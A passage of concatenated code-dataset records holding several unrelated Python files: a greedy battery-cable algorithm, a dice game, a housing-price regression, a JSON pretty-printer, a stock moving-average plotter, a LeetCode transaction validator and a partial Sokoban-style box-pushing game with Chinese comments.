[int(house.x_coordinate),int(house.y_coordinate)]\n\n # first points where the cable goes through \n latest = house_c\n\n # determine which points in the grid the cable goes through \n if house_c[1] >= battery_c[1]:\n while latest[1] > battery_c[1]:\n house.cables.append(tuple(latest))\n latest[1] = latest[1]-1\n else:\n while latest[1] < battery_c[1]:\n house.cables.append(tuple(latest))\n latest[1] = latest[1]+1\n \n if house_c[0] >= battery_c[0]:\n while latest[0] > battery_c[0]:\n house.cables.append(tuple(latest))\n latest[0] = latest[0] - 1\n else:\n while latest[0] < battery_c[0]:\n house.cables.append(tuple(latest))\n latest[0] = latest[0] + 1\n \n # final destination of the cable\n house.cables.append(tuple(battery_c))\n\n\n# greedy algorithm that takes output and capacity into account\nclass restricted_greedy():\n def __init__(self, grid):\n pass\n\n def run(self, grid, district_number):\n all_batteries = list(grid.all_batteries.values())\n\n # Makes a list with each battery, max capacity and the current output\n capacities_and_outputs = []\n\n # Makes a list with houses and their outputs \n by_output= []\n\n for Battery in all_batteries:\n capacities_and_outputs.append([Battery,float(Battery.capacity),0])\n\n # Finds the closest house to connect \n for House in grid.all_houses.values():\n by_output.append([House, float(House.output)])\n \n\n # order houses by output for district 3\n if district_number == 3:\n by_output = sorted(by_output, key=itemgetter(1), reverse= True)\n\n for House in by_output:\n closest_distance = 100000000\n closest_battery = None\n\n # make sure the house is the closest and does not go over the max capacity \n for Battery in capacities_and_outputs:\n distance = find_distance(House[0], Battery[0])\n \n if distance < closest_distance and Battery[2] + House[1] < Battery[1]:\n closest_battery = Battery[0]\n closest_distance = distance\n \n # connect house to battery and update current output \n House[0].battery = closest_battery\n \n for i in capacities_and_outputs:\n if i[0] == closest_battery: i[2] = i[2] + House[1]\n \n for House in grid.all_houses.values():\n create_cable(House, House.battery) \n \n # return grid of connected houses and batteries \n return grid\n \n def calculate_cost(self, grid):\n\n # initial empty cost\n total_cost = 0\n\n # add cost of batteries\n total_cost += (5000 * len(grid.all_batteries.values()))\n\n # add cost of cables\n for House in grid.all_houses.values():\n total_cost += (len(House.cables) - 1) * 9\n \n # return total\n return total_cost ","sub_path":"code/algorithms/greedy.py","file_name":"greedy.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5480897","text":"# 5 dice Ivan and Maria\r\nfrom random import randint\r\n\r\nIVAN_DICE = 5\r\nMARIA_DICE = 5\r\n\r\nivan_score = 1001\r\nmaria_score = 1001\r\n\r\nwhile True:\r\n\r\n # 6 throws for Maria\r\n\r\n counter = 1\r\n dice_roll_sum = 0\r\n\r\n while counter <= 6:\r\n dice_roll = randint(1, 6)\r\n dice_roll_sum += dice_roll\r\n counter += 1\r\n\r\n if maria_score > 0:\r\n maria_score -= dice_roll_sum\r\n\r\n elif maria_score < 0:\r\n maria_score += dice_roll_sum\r\n\r\n print(\"Maria rolls: \" + str(dice_roll_sum) + \" and has a score of: \" + str(maria_score))\r\n\r\n if maria_score == 0:\r\n # Maria win\r\n break\r\n\r\n # 6 throws for Ivan\r\n counter = 1\r\n dice_roll_sum = 0\r\n\r\n while counter <= 6:\r\n dice_roll = randint(1, 6)\r\n dice_roll_sum += dice_roll\r\n\r\n counter += 1\r\n\r\n if ivan_score > 0:\r\n ivan_score -= dice_roll_sum\r\n\r\n elif ivan_score < 0:\r\n ivan_score += dice_roll_sum\r\n\r\n print(\"Ivan rolls: \" + str(dice_roll_sum) + \" and has a score of: \" + str(ivan_score))\r\n\r\n if ivan_score == 0:\r\n # Ivan win\r\n break\r\n\r\nif ivan_score == 0:\r\n print(\"Ivan wins!\")\r\nelif maria_score == 0:\r\n print(\"Maria wins!\")\r\n","sub_path":"Week 1/Task 28.py","file_name":"Task 28.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"216447750","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn import datasets, linear_model\nfrom sklearn.model_selection import cross_val_predict\n\nFEATURES = [\n \"CRIM\",\n \"ZN\",\n \"INDUS\",\n \"CHAS\",\n \"NOX\",\n \"RM\",\n \"AGE\",\n \"DIS\",\n \"RAD\",\n \"TAX\",\n \"PTRATIO\",\n \"B_RATIO\",\n \"LSTAT\",\n]\n\n\ndef mean_absolute_percentage_error(y_true, y_pred):\n return np.mean(np.abs((y_true - y_pred) / y_true)) * 100\n\n\ndef run_model():\n # Data Engineer\n boston = datasets.load_boston()\n boston_df = pd.DataFrame(boston.data, columns=FEATURES)\n boston_df[\"LABELS\"] = boston.target\n\n boston_df = boston_df[boston_df[\"LABELS\"] < 50]\n\n # Data Scientist\n lr = linear_model.LinearRegression()\n predicted = cross_val_predict(lr, boston_df[FEATURES], boston_df[\"LABELS\"], cv=10)\n results = mean_absolute_percentage_error(boston_df[\"LABELS\"], predicted)\n return results\n\n\nif __name__ == \"__main__\":\n results = run_model()\n print(\"Your MAPE Score is: {:.2f}%\".format(results))\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"322586061","text":"from termcolor import colored\nfrom lib.visitors.JSONVisitor import JSONVisitor\n\n\nclass PrettyVisitor(JSONVisitor):\n TAB = 3 * ' '\n OBJTMPL = '{{\\n' + \\\n '{content}\\n' + \\\n '{tabs}}}'\n OBJITEMTMPL = '{tabs}\"{key}\": {val}'\n\n LISTTMPL = '[\\n' + \\\n '{content}\\n' + \\\n '{tabs}]'\n LISTITEMTMPL = '{tabs}{val}'\n\n CLISTTMPL = '[{content}]'\n CLISTITEMTMPL = '{val}'\n COBJTMPL = '{{{content}}}'\n COBJITEMTMPL = '\"{key}\":{val}'\n\n def __init__(self, compact=False, color=True):\n self.tabs = 0\n self.compact = compact\n if compact:\n self.list_template = self.CLISTTMPL\n self.list_item_tmpl = self.CLISTITEMTMPL\n self.obj_template = self.COBJTMPL\n self.obj_item_tmpl = self.COBJITEMTMPL\n else:\n self.list_template = self.LISTTMPL\n self.list_item_tmpl = self.LISTITEMTMPL\n self.obj_template = self.OBJTMPL\n self.obj_item_tmpl = self.OBJITEMTMPL\n\n if color:\n self.bool_color = lambda val: colored(val, 'yellow')\n self.int_color = lambda val: colored(val, 'red')\n self.str_color = lambda val: colored('\"{}\"'.format(val), 'cyan')\n self.null_color = lambda val: colored(val, 'blue')\n self.unkown_color = lambda val: colored(val, 'white')\n self.key_color = lambda key: colored(key, 'green')\n else:\n def plain_color(val): return val\n self.bool_color = plain_color\n self.int_color = plain_color\n self.str_color = lambda val: '\"{}\"'.format(val)\n self.null_color = plain_color\n self.unkown_color = plain_color\n self.key_color = plain_color\n\n def visit_node(self, node):\n self.tabs += 1\n res = node.accept(self)\n self.tabs -= 1\n return res\n\n def visit_base(self, node):\n val = node.val\n if isinstance(val, bool):\n return self.bool_color(val)\n elif isinstance(val, int):\n return self.int_color(val)\n elif isinstance(val, str):\n return self.str_color(val)\n elif val is None:\n return self.null_color(val)\n else:\n return self.unkown_color(val)\n\n def visit_dict(self, node):\n if len(node.children.items()) == 0:\n return \"{}\"\n\n content = ''\n for i, item in enumerate(node.children.items()):\n key, val = item\n content += self.obj_item_tmpl.format(\n tabs=(self.tabs+1) * self.TAB,\n key=self.key_color(key),\n val=self.visit_node(val))\n if i != len(node.children) - 1:\n content += ','\n if not self.compact:\n content += '\\n'\n\n return self.obj_template.format(\n tabs=self.tabs * self.TAB,\n content=content)\n\n def visit_list(self, node):\n if len(node.children.items()) == 0:\n return \"[]\"\n\n content = ''\n for key, val in node.children.items():\n content += self.list_item_tmpl.format(\n tabs=(self.tabs+1) * self.TAB,\n val=self.visit_node(val))\n if key != len(node.children) - 1:\n content += ','\n if not self.compact:\n content += '\\n'\n\n return self.list_template.format(\n tabs=self.tabs * self.TAB,\n content=content)\n","sub_path":"lib/visitors/PrettyVisitor.py","file_name":"PrettyVisitor.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"244439246","text":"import logging\n\nlg = logging.getLogger('schlang')\nlogging.basicConfig(format='%(asctime)s %(levelname)-8s %(threadName)-15s %(funcName)-15s %(message)s')\nlg.addHandler(logging.StreamHandler())\nlg.setLevel(0)\nauto_restart = False\ndefault_name = 'schlang'\n\nhas_zombies = True\nzombie_debug = False\nzombie_count = 10\nzombie_spawn_radius = 5000\nzombie_spawn_delay = 1\n\nfrom enum import Enum\nclass States(Enum):\n WAITING_START = 0\n STARTED = 1\n DEAD = 2\n","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499602322","text":"# -*- coding: utf-8\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n\nimport pandas as pd\nimport jsm\nimport datetime\nimport matplotlib.finance as mpf\n\nfrom matplotlib.dates import date2num\n\n\n# 株価のデータ取得(銘柄コード, 開始日, 終了日)\ndef get_stock(code, start_date, end_date):\n\n # 期間設定\n\n year, month, day = start_date.split(\"-\")\n\n start = datetime.date(int(year), int(month), int(day))\n\n year, month, day = end_date.split(\"-\") \n\n end = datetime.date(int(year), int(month), int(day))\n\n # 株価データ取得\n\n q = jsm.Quotes()\n\n target = q.get_historical_prices(code, jsm.DAILY, start_date = start, end_date = end)\n\n # 項目ごとにリストに格納して返す\n\n date = [data.date for data in target]\n\n open = [data.open for data in target]\n\n close = [data.close for data in target]\n\n high = [data.high for data in target]\n\n low = [data.low for data in target]\n\n # 日付が古い順に並び替えて返す\n\n return [date[::-1], open[::-1], close[::-1], high[::-1], low[::-1]]\n\n\n\n\n# 移動平均線の計算(データ, 日数)\ndef move_average(data, day):\n return np.convolve(data, np.ones(day)/float(day), 'valid')\n \ndef main():\n args = sys.argv\n print( args)\n\n print( u'銘柄コード(第1引数):' + args[1])\n print( u'開始日  (第2引数):' + args[2])\n print( u'終了日  (第3引数):' + args[3])\n print( u'移動平均線(第4引数):' + args[4])\n print( u'移動平均線(第5引数):' + args[5])\n\n data1 = args[1]\n data2 = args[2]\n data3 = args[3]\n data4 = int(args[4])\n data5 = int(args[5])\n\n\n startDaystr = args[2]\n\n # 株価の取得(銘柄コード, 開始日, 終了日)\n code = args[1]\n today = datetime.date.today()\n print(today)\n todaystr = today.strftime('%Y-%m-%d')\n print(todaystr)\n\n #data_to_df1 = get_stock(code, '2017-1-1', todaystr)\n \n dataDF1 = \"data_to_df1.csv\"\n dataDF2 = \"data_to_df2.csv\"\n dataDF3 = \"data_to_df3.csv\"\n\n\n # データフレームの作成\n #df1 = pd.DataFrame({'始値':data_to_df1[1], '終値':data_to_df1[2], '高値':data_to_df1[3], '安値':data_to_df1[4]}, index = data_to_df1[0])\n #df1.to_csv(dataDF1)\n\n print(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\")\n\n #data_to_df2 = get_stock(code, '2016-1-1', '2016-12-31')\n\n # データフレームの作成\n #df2 = pd.DataFrame({'始値':data_to_df2[1], '終値':data_to_df2[2], '高値':data_to_df2[3], '安値':data_to_df2[4]}, index = data_to_df2[0])\n #df2.to_csv(dataDF2)\n\n\n print(\"^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\")\n\n data_to_df3 = get_stock(code, startDaystr, todaystr)\n\n # データフレームの作成\n df3 = pd.DataFrame({'始値':data_to_df3[1], '終値':data_to_df3[2], '高値':data_to_df3[3], '安値':data_to_df3[4]}, index = data_to_df3[0])\n df3.to_csv(dataDF3)\n\n\n\n\n\n # CSVのロード(2015年と2016年のデータ)\n #data15 = np.genfromtxt(\"nikkei15.csv\", delimiter=\",\", skip_header=1, dtype='float')\n #data16 = np.genfromtxt(\"nikkei16.csv\", delimiter=\",\", skip_header=1, dtype='float')\n\n #data15 = np.genfromtxt(data2, delimiter=\",\", skip_header=1, dtype='float')\n #data16 = np.genfromtxt(data3, delimiter=\",\", skip_header=1, dtype='float')\n\n #data15 = np.genfromtxt(dataDF1, delimiter=\",\", skip_header=1, dtype='float')\n #data16 = np.genfromtxt(dataDF2, delimiter=\",\", skip_header=1, dtype='float')\n\n\n data15 = np.genfromtxt(dataDF3, delimiter=\",\", skip_header=1, dtype='float')\n\n # 5列目の終値だけを日付古い順に並び替えて取り出し\n #f15, f16 = data15[:,4], data16[:,4]\n #f15, f16 = f15[::-1], f16[::-1]\n \n f15 = data15[:,4]\n f15 = f15[::-1]\n\n # 移動平均線(25日線)の計算\n day = data4 # 日数\n #data = np.r_[f15[len(f15)-day+1:len(f15)], f16] # 2015年の終値の一部と2016年の終値を結合\n data = f15\n ma_25d = move_average(data, day)\n\n print(data)\n\n # 移動平均線(75日線)の計算\n day = data5 # 日数\n #data = np.r_[f15[len(f15)-day+1:len(f15)], f16] # 2015年の終値の一部と2016年の終値を結合\n data = f15\n ma_75d = move_average(data, day)\n \n\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\n print(data)\n\n # グラフにプロット\n plt.plot(f15, label=\"f\")\n plt.plot(ma_25d, \"--\", color=\"r\", label=\"MA 10d\")\n plt.plot(ma_75d, \"--\", color=\"g\", label=\"MA 20d\") \n \n\n\n\n\n # グラフにプロット\n\n fig = plt.figure()\n\n ax = plt.subplot()\n\n mpf.candlestick2_ohlc(ax, df3['始値'], df3['高値'], df3['安値'], df3['終値'], width=0.5, colorup=\"g\", colordown=\"r\")\n\n\n ax.grid()\n\n ax.legend()\n\n fig.autofmt_xdate() #x軸のオートフォーマット\n\n\n\n\n\n\n\n\n\n\n # ラベル軸\n plt.title(data1)\n plt.xlabel(\"Day\")\n plt.ylabel(\"f\")\n # 凡例\n plt.legend(loc=\"4\")\n # グリッド\n plt.grid()\n\n\n # グラフ表示\n plt.show()\n\n \nif __name__ == \"__main__\":\n main()\n\n","sub_path":"aikt_moving_average.py","file_name":"aikt_moving_average.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"11700700","text":"\"\"\"\nA transaction is possibly invalid if:\n the amount exceeds $1000, or;\n if it occurs within (and including) 60 minutes of another transaction with the same name in a different city.\n\nEach transaction string transactions[i] consists of comma separated values representing the name, time (in minutes), amount, and city of the transaction.\n\nGiven a list of transactions, return a list of transactions that are possibly invalid. You may return the answer in any order.\n\n\nExample 1:\n Input: transactions = [\"alice,20,800,mtv\",\"alice,50,100,beijing\"]\n Output: [\"alice,20,800,mtv\",\"alice,50,100,beijing\"]\n Explanation: The first transaction is invalid because the second transaction occurs within a difference of 60 minutes, have the same name and is in a different city. Similarly the second one is invalid too.\n\nExample 2:\n Input: transactions = [\"alice,20,800,mtv\",\"alice,50,1200,mtv\"]\n Output: [\"alice,50,1200,mtv\"]\n\nExample 3:\n Input: transactions = [\"alice,20,800,mtv\",\"bob,50,1200,mtv\"]\n Output: [\"bob,50,1200,mtv\"]\n\nConstraints:\n\ntransactions.length <= 1000\nEach transactions[i] takes the form \"{name},{time},{amount},{city}\"\nEach {name} and {city} consist of lowercase English letters, and have lengths between 1 and 10.\nEach {time} consist of digits, and represent an integer between 0 and 1000.\nEach {amount} consist of digits, and represent an integer between 0 and 2000\n\"\"\"\n\ndef invalidTransactions(transactions):\n transactions_list = list()\n invalid_transactions = list()\n for t in transactions:\n if len(t) > 1000:\n invalid_transactions.append(t)\n continue\n t_list = t.split(\",\")\n transactions_list.append(t_list)\n try:\n int(t_list[1])\n if int(t_list[1]) < 0 or int(t_list[1]) > 1000:\n invalid_transactions.append(t)\n continue\n except ValueError:\n invalid_transactions.append(t)\n continue\n try:\n int(t_list[2])\n if int(t_list[2]) < 0 or int(t_list[2]) > 1000:\n invalid_transactions.append(t)\n continue\n except ValueError:\n invalid_transactions.append(t)\n continue\n try:\n int(t_list[0])\n invalid_transactions.append(t)\n continue\n except ValueError:\n if not t_list[0].islower() or len(t_list[0]) < 1 or len(t_list[0]) > 10:\n invalid_transactions.append(t)\n continue\n try:\n int(t_list[3])\n invalid_transactions.append(t)\n continue\n except ValueError:\n if not t_list[3].islower() or len(t_list[3]) < 1 or len(t_list[3]) > 10:\n invalid_transactions.append(t)\n continue\n data = dict()\n for t in transactions_list:\n if t[0] in data:\n for i in range(0, len(data[t[0]]['city'])):\n if t[3] != data[t[0]]['city'][i] and abs(int(data[t[0]]['time'][i]) - int(t[1])) <= 60:\n if ','.join(t) not in invalid_transactions:\n invalid_transactions.append(','.join(t))\n old_transaction = ','.join([t[0], data[t[0]]['time'][i], data[t[0]]['amount'][i], data[t[0]]['city'][i]])\n if old_transaction not in invalid_transactions:\n invalid_transactions.append(old_transaction)\n data[t[0]]['time'].append(t[1])\n data[t[0]]['amount'].append(t[2])\n data[t[0]]['city'].append(t[3])\n else:\n data[t[0]] = {'time': [t[1]],'amount':[t[2]], 'city': [t[3]]}\n return invalid_transactions\n\n\ntransactions1 = [\"alice,20,800,mtv\",\"alice,50,100,beijing\"]\ntransactions2 = [\"alice,20,800,mtv\",\"alice,50,1200,mtv\"]\ntransactions3 = [\"alice,20,800,mtv\",\"bob,50,1200,mtv\"]\ntransactions4 = [\"bob,689,1910,barcelona\",\"alex,696,122,bangkok\",\"bob,832,1726,barcelona\",\"bob,820,596,bangkok\",\"chalicefy,217,669,barcelona\",\"bob,175,221,amsterdam\"]\n\ntransactions5 = [\"bob,627,1973,amsterdam\",\"alex,387,885,bangkok\",\"alex,355,1029,barcelona\",\"alex,587,402,bangkok\",\"chalicefy,973,830,barcelona\",\"alex,932,86,bangkok\",\"bob,188,989,amsterdam\"]\ntransactions6 = [\"xnova,261,1949,chicago\",\"bob,206,1284,chicago\",\"xnova,420,996,bangkok\",\"chalicefy,704,1269,chicago\",\"iris,124,329,bangkok\",\"xnova,791,700,amsterdam\",\"chalicefy,572,697,budapest\",\"chalicefy,231,310,chicago\",\"chalicefy,763,857,chicago\",\"maybe,837,198,amsterdam\",\"lee,99,940,bangkok\",\"bob,132,1219,barcelona\",\"lee,69,857,barcelona\",\"lee,607,275,budapest\",\"chalicefy,709,1171,amsterdam\"]\n\nprint(invalidTransactions(transactions6))\n\n\n\n","sub_path":"LeetCode-Python/1169 Invalid Transactions.py","file_name":"1169 Invalid Transactions.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"56615778","text":"# --*-- coding:utf-8 --*--\r\nimport configparser\r\nimport os\r\n\r\n\r\nclass NewConfigParser(configparser.ConfigParser):\r\n # 原方法会将option全部置为小写,改写后会按照原文输出\r\n def optionxform(self, optionstr):\r\n return optionstr\r\n\r\n\r\nclass Common(object):\r\n\r\n array = [['*' for i in range(10)] for j in range(10)]\r\n\r\n @staticmethod\r\n def check_dict(set_data):\r\n \"\"\"arr for 背景\r\n o for 目标 [x][y]\r\n p for 推->箱子 [x][y]\r\n q for 墙 [x][y]\r\n r for 人 [x][y]\"\"\"\r\n if type(set_data) != dict:\r\n print('没有可以用的字典。')\r\n return 'ng', \"ng\", \"ng\", \"ng\"\r\n arr = set_data['arr']\r\n if type(arr) != list:\r\n print(\"没有可以用的列表。\")\r\n return \"ng\", \"ng\", \"ng\", \"ng\"\r\n _r = set_data['r']\r\n _o = set_data['o']\r\n if type(_o[0]) != list:\r\n print(\"没有配置目标可以用的列表。\")\r\n return \"ng\", \"ng\", \"ng\", \"ng\"\r\n _p = set_data['p']\r\n if type(_p[0]) != list:\r\n print(\"没有配置箱子可以用的列表。\")\r\n return \"ng\", \"ng\", \"ng\", \"ng\"\r\n if len(_o) != len(_p):\r\n print(\"箱子数 {} 和目标数 {} 不一致。\".format(_p, _o))\r\n return \"ng\", \"ng\", \"ng\", \"ng\"\r\n\r\n return arr, _r, _p, _o\r\n\r\n @staticmethod\r\n def up(set_data):\r\n arr, _r, _p, _o = Common().check_dict(set_data)\r\n if arr == \"ng\":\r\n print(\"检查输入存在问题,需要重新配置游戏。\")\r\n set_data[\"result\"] = '检查输入存在问题,需要重新配置游戏。'\r\n return set_data\r\n if _r[0] == 0:\r\n print(\"无法向上了,已经到顶了。\")\r\n set_data[\"result\"] = '无法向上了,已经到顶了。'\r\n return set_data\r\n # 还要判断是不是有墙的问题\r\n else:\r\n # 如果人上有箱子\r\n if [int(_r[0]) - 1, _r[1]] in _p:\r\n index = _p.index([_r[0]-1, _r[1]])\r\n # 判断箱子上面有没有箱子\r\n if [_p[index][0]-1, _p[index][1]] in _p:\r\n print(\"没有那么大的力气,移不动两个箱子。\")\r\n set_data[\"result\"] = '没有那么大的力气,移不动两个箱子。'\r\n return set_data\r\n if _r[0] - 1 == _p[index][0] and _p[index][0] == 0 and _r[1] == _p[index][1]:\r\n print(\"不能推动箱子了,箱子已经到顶了。\")\r\n set_data[\"result\"] = '不能推动箱子了,箱子已经到顶了。'\r\n return set_data\r\n elif _r[0] - 1 == _p[index][0] and _p[index][0] != 0 and _r[1] == _p[index][1]:\r\n \"\"\"箱子在人的上面\"\"\"\r\n arr[_p[index][0] - 1][_p[index][1]] = 'P'\r\n arr[_r[0] - 1][_r[1]] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n if [_p[index][0] - 1, _p[index][1]] in _o:\r\n print(\"恭喜你,箱子到达目标。\")\r\n arr[_p[index][0] - 1][_p[index][1]] = 'OP'\r\n _r = [_r[0] - 1, _r[1]]\r\n _p[index] = [_p[index][0] - 1, _p[index][1]]\r\n else:\r\n \"\"\"人的上面没有东西,可以随意搬动\"\"\"\r\n arr[_r[0] - 1][_r[1]] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n _r = [_r[0] - 1, _r[1]]\r\n for oi in range(len(_o)):\r\n if arr[int(_o[oi][0])][int(_o[oi][1])] == \"*\":\r\n arr[int(_o[oi][0])][int(_o[oi][1])] = \"O\"\r\n op_flag = 0\r\n for op in range(len(_o)):\r\n if [_p[op][0], _p[op][1]] not in _o:\r\n op_flag = 1\r\n break\r\n return_data = {\"arr\": arr, \"o\": _o, \"p\": _p, \"r\": _r}\r\n if op_flag == 0:\r\n return_data['result'] = 'ok'\r\n else:\r\n return_data['result'] = \"ng\"\r\n print('人当前的位置 : {}'.format(_r))\r\n print('目标当前位置 : {}'.format(_o))\r\n print('箱子当前位置 : {}'.format(_p))\r\n return return_data\r\n\r\n @staticmethod\r\n def down(set_data):\r\n arr, _r, _p, _o = Common().check_dict(set_data)\r\n if arr == \"ng\":\r\n print(\"检查输入存在问题,需要重新配置游戏。\")\r\n set_data[\"result\"] = '检查输入存在问题,需要重新配置游戏。'\r\n return set_data\r\n if _r[0] == len(arr) - 1:\r\n print(\"无法向下了,已经到底了。\")\r\n set_data[\"result\"] = '无法向下了,已经到底了。'\r\n return set_data\r\n # 判断墙的存在\r\n else:\r\n if [_r[0] + 1, _r[1]] in _p:\r\n index = _p.index([_r[0]+1, _r[1]])\r\n # 判断箱子上面有没有箱子\r\n if [_p[index][0]+1, _p[index][1]] in _p:\r\n print(\"没有那么大的力气,移不动两个箱子。\")\r\n set_data[\"result\"] = '没有那么大的力气,移不动两个箱子。'\r\n return set_data\r\n if _r[0] + 1 == _p[index][0] and _p[index][0] == len(arr) - 1 and _r[1] == _p[index][1]:\r\n print(\"不能推动箱子了,箱子已经到底了。\")\r\n set_data[\"result\"] = '不能推动箱子了,箱子已经到底了。'\r\n return set_data\r\n elif _r[0] + 1 == _p[index][0] and _p[index][0] != len(arr) - 1 and _r[1] == _p[index][1]:\r\n \"\"\"箱子在人的下面\"\"\"\r\n arr[_p[index][0] + 1][_p[index][1]] = 'P'\r\n arr[_r[0] + 1][_r[1]] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n if [_p[index][0] + 1, _p[index][1]] in _o:\r\n print(\"恭喜你,箱子到达目标。\")\r\n arr[_p[index][0] + 1][_p[index][1]] = 'OP'\r\n _r = [_r[0] + 1, _r[1]]\r\n _p[index] = [_p[index][0] + 1, _p[index][1]]\r\n else:\r\n \"\"\"人的下面没有东西,可以随意搬动\"\"\"\r\n arr[_r[0] + 1][_r[1]] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n _r = [_r[0] + 1, _r[1]]\r\n for oi in range(len(_o)):\r\n if arr[_o[oi][0]][_o[oi][1]] == \"*\":\r\n arr[_o[oi][0]][_o[oi][1]] = \"O\"\r\n op_flag = 0\r\n for op in range(len(_o)):\r\n if [_p[op][0], _p[op][1]] not in _o:\r\n op_flag = 1\r\n break\r\n return_data = {\"arr\": arr, \"o\": _o, \"p\": _p, \"r\": _r}\r\n if op_flag == 0:\r\n return_data['result'] = 'ok'\r\n else:\r\n return_data['result'] = \"ng\"\r\n print('人当前的位置 : {}'.format(_r))\r\n print('目标当前位置 : {}'.format(_o))\r\n print('箱子当前位置 : {}'.format(_p))\r\n return return_data\r\n\r\n @staticmethod\r\n def left(set_data):\r\n arr, _r, _p, _o = Common().check_dict(set_data)\r\n if arr == \"ng\":\r\n print(\"检查输入存在问题,需要重新配置游戏。\")\r\n set_data[\"result\"] = '检查输入存在问题,需要重新配置游戏。'\r\n return set_data\r\n if _r[1] == 0:\r\n print(\"无法向左了,已经到头了。\")\r\n set_data[\"result\"] = '无法向左了,已经到头了。'\r\n return set_data\r\n else:\r\n if [_r[0], _r[1] - 1] in _p:\r\n index = _p.index([_r[0], _r[1]-1])\r\n # 判断箱子上面有没有箱子\r\n if [_p[index][0], _p[index][1] - 1] in _p:\r\n print(\"没有那么大的力气,移不动两个箱子。\")\r\n set_data[\"result\"] = '没有那么大的力气,移不动两个箱子。'\r\n return set_data\r\n if _r[1] - 1 == _p[index][1] and _p[index][1] == 0 and _r[0] == _p[index][0]:\r\n print(\"不能推动箱子了,箱子已经到头了。\")\r\n set_data[\"result\"] = '不能推动箱子了,箱子已经到头了。'\r\n return set_data\r\n elif _r[1] - 1 == _p[index][1] and _p[index][1] != 0 and _r[0] == _p[index][0]:\r\n \"\"\"箱子在人的左面\"\"\"\r\n arr[_p[index][0]][_p[index][1] - 1] = 'P'\r\n arr[_r[0]][_r[1] - 1] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n if [_p[index][0], _p[index][1] - 1] in _o:\r\n print(\"恭喜你,箱子到达目标。\")\r\n arr[_p[index][0]][_p[index][1] - 1] = 'OP'\r\n _r = [_r[0], _r[1] - 1]\r\n _p[index] = [_p[index][0], _p[index][1] - 1]\r\n else:\r\n \"\"\"人的下面没有东西,可以随意搬动\"\"\"\r\n arr[_r[0]][_r[1] - 1] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n _r = [_r[0], _r[1] - 1]\r\n for oi in range(len(_o)):\r\n if arr[_o[oi][0]][_o[oi][1]] == \"*\":\r\n arr[_o[oi][0]][_o[oi][1]] = \"O\"\r\n op_flag = 0\r\n for op in range(len(_o)):\r\n if [_p[op][0], _p[op][1]] not in _o:\r\n op_flag = 1\r\n break\r\n return_data = {\"arr\": arr, \"o\": _o, \"p\": _p, \"r\": _r}\r\n if op_flag == 0:\r\n return_data['result'] = 'ok'\r\n else:\r\n return_data['result'] = \"ng\"\r\n print('人当前的位置 : {}'.format(_r))\r\n print('目标当前位置 : {}'.format(_o))\r\n print('箱子当前位置 : {}'.format(_p))\r\n return return_data\r\n\r\n @staticmethod\r\n def right(set_data):\r\n arr, _r, _p, _o = Common().check_dict(set_data)\r\n if arr == \"ng\":\r\n print(\"检查输入存在问题,需要重新配置游戏。\")\r\n set_data[\"result\"] = '检查输入存在问题,需要重新配置游戏。'\r\n return set_data\r\n if _r[1] == len(arr[0]) - 1:\r\n print(\"无法向右了,已经到结尾了。\")\r\n set_data[\"result\"] = '无法向右了,已经到结尾了。'\r\n return set_data\r\n # 考虑是否存在墙的问题\r\n else:\r\n if [_r[0], _r[1] + 1] in _p:\r\n index = _p.index([_r[0], _r[1]+1])\r\n # 判断箱子上面有没有箱子\r\n if [_p[index][0], _p[index][1] + 1] in _p:\r\n print(\"没有那么大的力气,移不动两个箱子。\")\r\n set_data[\"result\"] = '没有那么大的力气,移不动两个箱子。'\r\n return set_data\r\n if _r[1] + 1 == _p[index][1] and _p[index][1] == len(arr[0]) - 1 and _r[0] == _p[index][0]:\r\n print(\"不能推动箱子了,箱子已经到结尾了。\")\r\n set_data[\"result\"] = '不能推动箱子了,箱子已经到结尾了。'\r\n return set_data\r\n elif _r[1] + 1 == _p[index][1] and _p[index][1] != len(arr[0]) - 1 and _r[0] == _p[index][0]:\r\n \"\"\"箱子在人的右面\"\"\"\r\n arr[_p[index][0]][_p[index][1] + 1] = 'P'\r\n arr[_r[0]][_r[1] + 1] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n if [_p[index][0], _p[index][1] + 1] in _o:\r\n print(\"恭喜你,箱子到达目标。\")\r\n arr[_p[index][0]][_p[index][1] + 1] = 'OP'\r\n _r = [_r[0], _r[1] + 1]\r\n _p[index] = [_p[index][0], _p[index][1] + 1]\r\n else:\r\n \"\"\"人的右面没有东西,可以随意走动\"\"\"\r\n arr[_r[0]][_r[1] + 1] = 'R'\r\n arr[_r[0]][_r[1]] = '*'\r\n _r = [_r[0], _r[1] + 1]\r\n for oi in range(len(_o)):\r\n if arr[_o[oi][0]][_o[oi][1]] == \"*\":\r\n arr[_o[oi][0]][_o[oi][1]] = \"O\"\r\n op_flag = 0\r\n for op in range(len(_o)):\r\n if [_p[op][0], _p[op][1]] not in _o:\r\n op_flag = 1\r\n break\r\n return_data = {\"arr\": arr, \"o\": _o, \"p\": _p, \"r\": _r}\r\n if op_flag == 0:\r\n 